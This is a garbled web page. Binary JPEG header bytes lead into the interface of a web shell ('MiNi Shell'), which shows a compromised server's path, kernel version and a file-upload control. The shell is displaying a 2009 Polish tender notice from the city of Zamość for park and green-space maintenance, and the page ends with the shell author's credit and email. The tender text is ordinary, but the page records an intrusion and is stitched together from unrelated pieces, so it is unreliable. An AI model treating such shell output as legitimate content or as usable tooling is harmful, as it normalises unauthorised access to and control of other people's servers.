JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090306/52190-N-2009.html

<p class="kh_header"><b>Zamość: Świadczenie usług na rzecz Miasta Zamość w zakresie bieżącego utrzymania  zieleni</b><br>
<b>Numer ogłoszenia: 52190 - 2009; data zamieszczenia: 06.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Zamość , Rynek Wielki 13, 22-400 Zamość, woj. lubelskie, tel. 084 6392084, faks 084 6393054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamosc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług na rzecz Miasta Zamość w zakresie bieżącego utrzymania  zieleni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest świadczenie usług na rzecz Miasta Zamość w zakresie bieżącego utrzymania  zieleni o łącznej powierzchni 68,9 ha z podziałem na dwa zadania:

Zadanie nr 1 o powierzchni 43,1 ha -  objęte ochroną konserwatorską poprzez wpis do rejestru zabytków województwa lubelskiego:
1)Park Miejski przy ul. Akademickiej wraz z przyległymi terenami zieleni o pow.  14,7ha w granicach: ul. Akademicka - ul. Kr. Jadwigi - teren OSiR - ul. Studzienna,
2)Planty wraz z przyległymi zieleńcami o pow.15,8ha w granicach: ul. Piłsudskiego -  ul. Peowiaków  - ul. Partyzantów - ul. Okopowa, ul. Łukasińskiego,
3)zieleń w obrębie Zespołu Staromiejskiego o pow.12,6ha  w granicach: ul. Okopowa, Droga Męczenników Rotundy - ul. Szczebrzeska - ul.Podgroble - ul. Kr. Jadwigi wraz z zieleńcami na Rynku Wodnym, Rynku Solny, kwietnikiem na Rynku Wielkim, donicami i skrzyniami na Starówce, konstrukcjami kwietnikowymi.

Zadanie nr 2 o ogólnej powierzchni 25,8 ha
1) teren wzdłuż rzeki Łabuńki na odcinku od ul. Okrzei - ul. Weteranów wraz                       
    z zieleńcem przy ul.Grunwaldzkiej i rzeki Topornicy od ul. Promiennej do budynków  
    TBS o pow. - 19,6ha
      2) zieleń osiedlowa - zieleńce zlokalizowane w różnych rejonach miasta o pow. - 6,2 ha,

 Rodzaj robót: 
1)pielęgnacja trawników - wiosenne i jesienne wygrabienie liści oraz zgarnięcie  w pryzmy, załadunek i wywóz tego samego dnia po wykonanych czynnościach,  koszenie trawników na terenie płaskim i skarpach kosiarkami mechanicznymi spalinowymi z taką częstotliwością, aby wysokość trawy nie przekraczała 10cm, niezwłoczne zebranie i usunięcie skoszonych traw, obcinanie brzegów trawnika   ze zgrabieniem darni i wywóz tego samego dnia po wykonanej pracy, odtworzenie trawnika w miejscach zniszczonych, rozgarnięcie kretowisk na trawnikach,
2)cięcia sanitarne, prześwietlające oraz ciecia techniczne drzew - usunięcie gałęzi lub konarów (jednorazowo do 15% żywej masy), zabezpieczenie grubszych ran preparatem specjalistycznym, wywóz biomasy w dniu wykonania zabiegu, 
3)wycinka drzew - usuwanie drzew i krzewów obumarłych, wywróconych, zagrażających    
           bezpieczeństwu ludzi i mienia wraz z frezowaniem pni na gł.15cm, wywozem    
          biomasy oraz zasypaniem miejsca po frezowaniu ziemią urodzajną i wysiew trawy,      
          pocięcie pnia i konarów na kloce opałowe, a następnie rozliczenie się z pozyskanego   
          drewna,
4)formowanie żywopłotów - przycinanie i kształtowanie całej powierzchni zielonej, cięcia sanitarne (usunięcie pędów uszkodzonych, chorych, suchych), cięcia odmładzające krzewów (usuwanie starych, najgrubszych gałęzi, pędów krzyżujących się i nadmiernie zagęszczonych) oraz z usunięcie ściętych pędów, wygrabienie i wywóz liści, pielenie wraz z zabraniem chwastów, zabezpieczenie roślin wieloletnich przed okresem zimowym, 
5)pielęgnacja roślin i utrzymanie donic i skrzyń, transport donic    i skrzyń z magazynu na wskazane miejsca na starówce, wypełnienie donic ziemią urodzajną, nawożenie nawozem wieloskładnikowym (zakup roślin oraz sadzenie zapewnia Zamawiający), podlewanie wodą w sposób zapewniający przesiąkanie bryły korzeniowej przy użyciu węża gumowego lub konewką z beczkowozu, spulchnianie gleby, odchwaszczanie, przycięcie kwiatostanów, nawożenie nawozem wieloskładnikowym, usunięcie starych kwiatów wraz z zebraniem i wywozem, przekopanie i zagrabienie kwietnika oraz wywóz zebranej masy tego samego dnia, oczyszczanie bruku wokół donic wraz z wywozem zanieczyszczeń
6)sadzenie kwiatów sezonowych na rabatach, w donicach, skrzyniach, konstrukcjach kwietnikowych - przygotowanie gruntu, wyznaczenie miejsc sadzenia, doniesienie roślin (materiał wykonawcy) wybicie roślin z doniczek, nawożenie  nawozem wieloskładnikowym, posadzenie, podlewanie wodą w sposób zapewniający przesiąkanie bryły korzeniowej przy użyciu węża gumowego lub konewką                    z beczkowozu, spulchnianie gleby, odchwaszczanie, przycięcie kwiatostanów, usunięcie starych kwiatów wraz z zebraniem i wywozem, przekopanie i zagrabienie kwietnika oraz wywóz zebranej masy tego samego dnia,
7)pielęgnacja kwietników bylinowych - przycięcie i usuwanie przekwitłych kwiatostanów, uzupełnienie brakujących kwiatów z uzupełnieniem ziemi oraz odcięciem darni, wyrównanie brzegów rabaty, podlewanie roślin, odchwaszczanie wraz zabraniem i wywozem chwastów, zabezpieczenie na zimę gałązkami z igliwia,
8)utrzymanie właściwego stanu dróg, ścieżek, alejek, urządzeń parkowych, parkingu, schodów -  zamiatanie całej powierzchni wraz z wywozem zanieczyszczeń tego samego dnia, likwidacja śliskości na nawierzchni alejek (posypywanie piaskiem), usuwanie śniegu,
9)powierzchniowe oczyszczanie terenu  - oczyszczanie terenu z gruzu, kamieni, gałęzi, liści i innych odpadów,  opróżnianie koszy parkowych wraz z wywozem odpadów na wysypisko, ustawianie koszy przewróconych bądź przestawionych, ustawianie koszy dodatkowych zakupionych przez Zamawiającego,
10)konserwacja elementów małej architektury: ogrodzenie, schody, mosty, urządzenia napuszczające wodę do stawu parkowego, ławki parkowe,  koszy na odpady i odchody psie, pomniki, place zabaw,
11)utrzymanie stawu parkowego: wiosenne oczyszczanie z liści, z  odpadów komunalnych, stawu i doprowadzalnika wody, wapnowanie dna i skarp stawu, konserwacja urządzeń napuszczających wodę, napuszczenie wody i regulacja poziomu wody, utrzymanie we właściwym stanie lustra wody, 
12)interwencyjne, niezależnie od zakresu prac wykonanie innych czynności związanych z utrzymaniem zieleni. Szczegółową ilość i rodzaj zawierają zakresy prac stanowiące załącznik nr 8 i nr 9..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki zawarte w art.22 pzp oraz nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 pzp.
2. Minimalne kryteria kwalifikacyjne dla Wykonawców przystępujących do przetargu są następujące:
a) Wykonawca winien być firmą, osobą fizyczną lub konsorcjum firm zarejestrowanych, zdolnym do wykonania usług  określonych w siwz,
b) Wykonawca wykonał w okresie ostatnich 3 lat przed dniem wszczęcia postępowania,          a jeżeli okres prowadzenia jest krótszy - w tym okresie - usługi  podobne do przedmiotu zamówienia min. jedno zadanie o wartości co najmniej 60 000 zł.
Przez podobne rozumie się  usługi  odpowiadające swoim rodzajem i wartościom usług  stanowiących  przedmiot zamówienia .
c) Wykonawca musi dysponować lub będzie dysponował  osobami zdolnymi do wykonania przedmiotu zamówienia - uprawnienia w zakresie pielęgnacji i konserwacji zieleni.
d) Wykonawca musi posiadać ubezpieczenie lub inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na  wartość  co najmniej  50.000 zł,
e) Wykonawca nie może zalegać z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne i społeczne  odpowiednio na rzecz Urzędu Skarbowego oraz Zakładu Ubezpieczeń Społecznych (lub KRUS).
f) Wykonawca powinien dysponować lub będzie dysponował narzędziami i urządzeniami niezbędnymi do realizacji przedmiotu zamówienia.

W celu potwierdzenia spełnienia warunków Oferent musi załączyć do oferty dokumenty wymagane w pkt VI SIWZ, na podstawie których zostanie dokonana ocena..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia i dokumenty wymagane:
1.formularz ofertowy wraz z wypełnionym kosztorysem  -  załącznik nr 1 do SIWZ,
2.oświadczenie, że oferent nie podlega wykluczeniu z postępowania na podstawie art. 24       
ust.1 i 2 pzp. oraz oświadczenie, że oferent spełnia wymogi art. 22 ust.1 ustawy Prawo zamówień publicznych - załącznik nr 2,
3.aktualny odpis z właściwego rejestru albo aktualny zaświadczenie o wpisie do ewidencji  
działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru                   lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej                                        6 miesięcy przed upływem terminu składania ofert,
4.aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego    
      oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia   
      Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem   
     podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń,  
      że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych   
płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
5.dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają       
z przepisów prawa lub innych dokumentów rejestrowych,
6.wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności z wykorzystaniem wzoru załącznik nr 3 do SIWZ,
Do wykazu należy dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia osób, zdolnych do wykonania zamówienia,  jeżeli w  w/w wykazie wykonawca wskazał osoby, którymi będzie dysponował w wykonywaniu zamówienia.
7.wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje lub będzie dysponował wykonawca, z wykorzystaniem wzoru - załącznik nr 4 do SIWZ   Do  wykazu należy dołączyć pisemne zobowiązanie innych podmiotów  do udostępnienia niezbędnych do wykonania  narzędzi i urządzeń, jeżeli w w/w wykazie wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował w wykonywaniu zamówienia.
8.wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie -  min. jedno zadanie o wartości co najmniej 60 000 zł, z wykorzystaniem wzoru - załącznik nr 5 do SIWZ,
9.dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
10.polisę a w przypadku jej braku, innego dokumentu potwierdzającego, że wykonawca jest  
ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na wartość co najmniej 50 000 zł,
11.aktualną  decyzję, wydaną przez właściwy organ na prowadzenie działalności w zakresie    
zbierania i transportu odpadów lub umowę o współpracy z podmiotem uprawnionym
12.osoby, które będą wykonywać zamówienie Zadanie nr 1 winne spełniać wymagania
      określone w § 8 ust. 4 i § 13 rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. 
    w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań  
       konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do   
       rejestru zabytków (Dz. U. Nr 150, poz.1579), 
       a w szczególności przedłożyć:
świadectwo ukończenia szkoły średniej w zakresie pielęgnacji zieleni, albo
dokumenty potwierdzające odbycie co najmniej 12 miesięcznej praktyki zawodowej  
       przy pielęgnacji tego rodzaju zabytków, albo
zaświadczenie o kwalifikacjach wynikające z § 18 i § 20 rozporządzenia Ministra Kultury
 i Sztuki z dnia 11 stycznia 1994 r. (Dz. U. Nr 16, poz. 55 z poźn. zm.) o zasadach i trybie udzielania zezwoleń na prowadzenie prac konserwatorskich przy zabytkach oraz prac archeologicznych i wykopaliskowych, warunkach ich prowadzenia i kwalifikacjach osób, które mają prawo prowadzenia tej działalności. 
13. oświadczenie o części zamówienia, której wykonanie Wykonawca zamierza powierzyć    
      podwykonawcom - załącznik nr 7 do SIWZ

W przypadku oferty Konsorcjum, każdy z członków Konsorcjum powinien złożyć dokumenty wymienione w pkt 3 i 4 oraz oświadczenie z art. 24 ust. 1 i 2 Pzp. Pozostałe dokumenty oraz oświadczenie z art 22 ust. 1 Pzp członkowie Konsorcjum mogą złożyć razem lub oddzielnie.


     Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
     Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 3 i 4 - składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
b)nie orzeczono wobec niego zakazu ubiegania się o zamówienie (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
c)nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert).
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
  
	Wyżej wymienione dokumenty są składane w formie oryginałów lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. W przypadku  wykonawców ubiegających się wspólnie o udzielenie zamówienia, każdy z nich przedkłada wszystkie dokumenty i oświadczenia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zamosc.um.gov.pl..<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację można także odebrać nieodpłatnie w siedzibie Zamawiającego: 
Urząd Miasta Zamość, Rynek Wielki 13, pokój nr 4..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2009 godzina 11:00, miejsce: Urząd Miasta Zamość 
Sekretariat Prezydenta Miasta Zamość pokój nr 7
22-400 Zamość, Rynek Wielki 13.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Miejsce i termin otwarcia ofert:
Urząd Miasta Zamość 
Wydział Gospodarki Mieszkaniowej, Ochrony Środowiska i Infrastruktury Komunalnej
Rynek Wielki 3,  22-400  Zamość
pokój nr 10 w dniu 17 marca 2009 r. o godz.12:00.   
Osoby upoważnione ze strony Zamawiającego do kontaktowania się z wykonawcami: 
   Pani Małgorzata Strzępek  - w zakresie procedury przetargowej tel. (084) 677-23-50, 
   Pan  Przemysław  Kozłowski tel. 084 677-24-38, Pani Elżbieta Cis - w zakresie przedmiotu zamówienia tel.(084) 677-24-36..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 o powierzchni 43,1 ha -  objęte ochroną konserwatorską poprzez wpis do rejestru zabytków województwa lubelskiego:
1)Park Miejski przy ul. Akademickiej wraz z przyległymi terenami zieleni o pow.  14,7ha w granicach: ul. Akademicka - ul. Kr. Jadwigi - teren OSiR - ul. Studzienna,
2)Planty wraz z przyległymi zieleńcami o pow.15,8ha w granicach: ul. Piłsudskiego -  ul. Peowiaków  - ul. Partyzantów - ul. Okopowa, ul. Łukasińskiego,
3)zieleń w obrębie Zespołu Staromiejskiego o pow.12,6ha  w granicach: ul. Okopowa, Droga Męczenników Rotundy - ul. Szczebrzeska - ul.Podgroble - ul. Kr. Jadwigi wraz z zieleńcami na Rynku Wodnym, Rynku Solny, kwietnikiem na Rynku Wielkim, donicami i skrzyniami na Starówce, konstrukcjami kwietnikowymi..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 o ogólnej powierzchni 25,8 ha
1) teren wzdłuż rzeki Łabuńki na odcinku od ul. Okrzei - ul. Weteranów wraz                       
    z zieleńcem przy ul.Grunwaldzkiej i rzeki Topornicy od ul. Promiennej do budynków  
    TBS o pow. - 19,6ha
      2) zieleń osiedlowa - zieleńce zlokalizowane w różnych rejonach miasta o pow. - 6,2 ha,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com